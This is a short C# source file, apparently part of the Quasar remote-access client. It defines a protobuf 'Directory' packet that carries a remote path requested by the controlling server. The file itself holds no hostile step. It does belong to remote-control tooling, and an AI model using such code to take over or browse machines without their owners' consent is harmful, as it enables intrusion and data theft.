Quasar/Client/Core/Packets/ServerPackets/Directory.cs

25 lines
470 B
C#

using ProtoBuf;
namespace xClient.Core.Packets.ServerPackets
{
[ProtoContract]
public class Directory : IPacket
{
[ProtoMember(1)]
public string RemotePath { get; set; }
public Directory()
{
}
public Directory(string remotepath)
{
this.RemotePath = remotepath;
}
public void Execute(Client client)
{
client.Send<Directory>(this);
}
}
}